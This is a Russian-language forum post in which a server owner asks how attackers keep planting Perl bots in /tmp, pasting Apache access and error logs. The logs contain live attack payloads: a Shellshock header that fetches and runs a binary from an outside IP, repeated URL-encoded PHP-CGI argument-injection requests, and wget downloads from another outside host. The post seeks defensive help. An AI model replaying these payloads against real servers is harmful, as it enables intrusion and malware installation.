Возможно дырка в веб-сервере?

matthew · Post by **matthew** » Wed Jul 22, 2015 9:02 am

Здравствуйте. Мой сервер с различной периодичностью подвергается атаке. Откуда и как делается я не могу понять.
Постоянно злоумышленник заливал perl боты в папку /var/tmp. У нее 777 права были (почему?). Поменял на 755. Атака прекратилась на 2-3 дня. После чего вновь возобновилась. Теперь взломщик заливает перл боты в папку /tmp, к слову у нее тоже права 777 (почему?), если выставить папке права 775 или 755 сразу отказывается запускаться mysql, не пускает в админку весты (может еще что). Как он заливает их? Вот пару логов:

/var/log/apache2/domains/мой ip.logShow

мой ip - - [21/Jul/2015:17:39:27 +0300] "GET / HTTP/1.0" 403 485 "() { :; }; /bin/bash -c \"rm -rf /tmp/*;echo wget http://120.132.178.112/avzy -O /tmp/China.Z-txlt\xd0 >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-txlt\xd0 >> /tmp/Run.sh;echo /tmp/China.Z-txlt\xd0 >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\"" "() { :; }; /bin/bash -c \"rm -rf /tmp/*;echo wget http://120.132.178.112/avzy -O /tmp/China.Z-txlt\xd0 >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-txlt\xd0 >> /tmp/Run.sh;echo /tmp/China.Z-txlt\xd0 >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\""
мой ip - - [21/Jul/2015:18:59:51 +0300] "GET / HTTP/1.0" 403 472 "-" "StatsInfo"
мой ip - - [21/Jul/2015:19:46:47 +0300] "GET /robots.txt HTTP/1.0" 403 470 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
мой ip - - [22/Jul/2015:03:26:25 +0300] "GET /rom-0 HTTP/1.0" 403 490 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
мой ip - - [21/Jul/2015:22:05:11 +0300] "GET /phpMyAdmin/scripts/setup.php HTTP/1.0" 403 513 "-" "-"
мой ip - - [21/Jul/2015:22:05:15 +0300] "GET /pma/scripts/setup.php HTTP/1.0" 403 506 "-" "-"
мой ip - - [21/Jul/2015:22:05:20 +0300] "GET /myadmin/scripts/setup.php HTTP/1.0" 403 510 "-" "-"
мой ip - - [21/Jul/2015:23:47:32 +0300] "GET / HTTP/1.0" 403 462 "http://www.baidu.com/s?wd=www" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
мой ip - - [22/Jul/2015:09:40:24 +0300] "POST /cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.0" 403 496 "-" "Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25"
мой ip - - [22/Jul/2015:09:40:24 +0300] "POST /cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.0" 403 496 "-" "Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25"
мой ip - - [22/Jul/2015:09:40:25 +0300] "POST /cgi-bin/php5?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.0" 403 497 "-" "Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25"
мой ip - - [22/Jul/2015:09:40:25 +0300] "POST /cgi-bin/php5?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.0" 403 497 "-" "Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25"
мой ip - - [22/Jul/2015:09:40:25 +0300] "POST /cgi-bin/php-cgi?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.0" 403 500 "-" "Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25"
мой ip - - [22/Jul/2015:09:40:25 +0300] "POST /cgi-bin/php-cgi?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.0" 403 500 "-" "Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25"
мой ip - - [22/Jul/2015:09:40:25 +0300] "POST /cgi-bin/php.cgi?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.0" 403 500 "-" "Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25"
мой ip - - [22/Jul/2015:09:40:25 +0300] "POST /cgi-bin/php.cgi?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.0" 403 500 "-" "Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25"
мой ip - - [22/Jul/2015:09:40:26 +0300] "POST /cgi-bin/php4?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.0" 403 497 "-" "Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25"
мой ip - - [22/Jul/2015:09:40:26 +0300] "POST /cgi-bin/php4?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.0" 403 497 "-" "Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25"
мой ip - - [22/Jul/2015:09:55:11 +0300] "POST /cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.0" 403 496 "-" "Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25"
мой ip - - [22/Jul/2015:09:55:11 +0300] "POST /cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.0" 403 496 "-" "Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25"
мой ip - - [22/Jul/2015:09:55:11 +0300] "POST /cgi-bin/php5?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.0" 403 497 "-" "Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25"
мой ip - - [22/Jul/2015:09:55:11 +0300] "POST /cgi-bin/php5?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.0" 403 497 "-" "Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25"
мой ip - - [22/Jul/2015:09:55:11 +0300] "POST /cgi-bin/php-cgi?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.0" 403 500 "-" "Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25"
мой ip - - [22/Jul/2015:09:55:11 +0300] "POST /cgi-bin/php-cgi?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.0" 403 500 "-" "Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25"
мой ip - - [22/Jul/2015:09:55:12 +0300] "POST /cgi-bin/php.cgi?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.0" 403 500 "-" "Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25"
мой ip - - [22/Jul/2015:09:55:12 +0300] "POST /cgi-bin/php.cgi?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.0" 403 500 "-" "Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25"
мой ip - - [22/Jul/2015:09:55:12 +0300] "POST /cgi-bin/php4?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.0" 403 497 "-" "Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25"
мой ip - - [22/Jul/2015:09:55:12 +0300] "POST /cgi-bin/php4?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.0" 403 497 "-" "Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25"
мой ip - - [22/Jul/2015:10:27:25 +0300] "GET /cgi-bin/php HTTP/1.0" 403 496 "-" "-"
мой ip - - [22/Jul/2015:10:27:25 +0300] "GET /cgi-bin/php5 HTTP/1.0" 403 497 "-" "-"
мой ip - - [22/Jul/2015:10:27:25 +0300] "GET /cgi-bin/php-cgi HTTP/1.0" 403 500 "-" "-"
мой ip - - [22/Jul/2015:10:27:25 +0300] "GET /cgi-bin/php.cgi HTTP/1.0" 403 500 "-" "-"
мой ip - - [22/Jul/2015:10:27:25 +0300] "GET /cgi-bin/php4 HTTP/1.0" 403 497 "-" "-"
мой ip - - [22/Jul/2015:10:57:27 +0300] "GET /phpMyAdmin/scripts/setup.php HTTP/1.0" 403 513 "-" "-"
мой ip - - [22/Jul/2015:10:57:31 +0300] "GET /pma/scripts/setup.php HTTP/1.0" 403 506 "-" "-"
мой ip - - [22/Jul/2015:10:57:34 +0300] "GET /myadmin/scripts/setup.php HTTP/1.0" 403 510 "-" "-"
мой ip - - [22/Jul/2015:11:07:49 +0300] "GET /cgi-bin/php HTTP/1.0" 403 496 "-" "-"
мой ip - - [22/Jul/2015:11:07:49 +0300] "GET /cgi-bin/php5 HTTP/1.0" 403 497 "-" "-"
мой ip - - [22/Jul/2015:11:07:50 +0300] "GET /cgi-bin/php-cgi HTTP/1.0" 403 500 "-" "-"
мой ip - - [22/Jul/2015:11:07:50 +0300] "GET /cgi-bin/php.cgi HTTP/1.0" 403 500 "-" "-"
мой ip - - [22/Jul/2015:11:07:50 +0300] "GET /cgi-bin/php4 HTTP/1.0" 403 497 "-" "-"

Дальше:

/var/log/apache2/error.logShow

[Sun Jul 19 07:35:12 2015] [notice] mod_ruid2/0.9.7 enabled
[Sun Jul 19 07:35:12 2015] [notice] Apache/2.2.22 (Debian) mod_fcgid/2.3.6 PHP/5.4.41-0+deb7u1 mod_ssl/2.2.22 OpenSSL/1.0.1e configured -- resuming normal operations
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed

0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0
100 16333 100 16333 0 0 76415 0 --:--:-- --:--:-- --:--:-- 111k
--2015-07-22 10:22:40-- http://195.242.220.89/mc
Connecting to 195.242.220.89:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 16333 (16K) [text/plain]
Saving to: `mc.1'

0K .......... ..... 100% 227K=0.07s

2015-07-22 10:22:40 (227 KB/s) - `mc.1' saved [16333/16333]

% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed

0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0
100 16333 100 16333 0 0 72488 0 --:--:-- --:--:-- --:--:-- 106k
--2015-07-22 10:34:19-- http://195.242.220.89/mc
Connecting to 195.242.220.89:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 16333 (16K) [text/plain]
Saving to: `mc.2'

0K .......... ..... 100% 207K=0.08s

2015-07-22 10:34:19 (207 KB/s) - `mc.2' saved [16333/16333]

% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed

0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0
100 16333 100 16333 0 0 66707 0 --:--:-- --:--:-- --:--:-- 97k
--2015-07-22 10:41:27-- http://195.242.220.89/mc
Connecting to 195.242.220.89:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 16333 (16K) [text/plain]
Saving to: `mc.3'

0K .......... ..... 100% 213K=0.07s

2015-07-22 10:41:27 (213 KB/s) - `mc.3' saved [16333/16333]

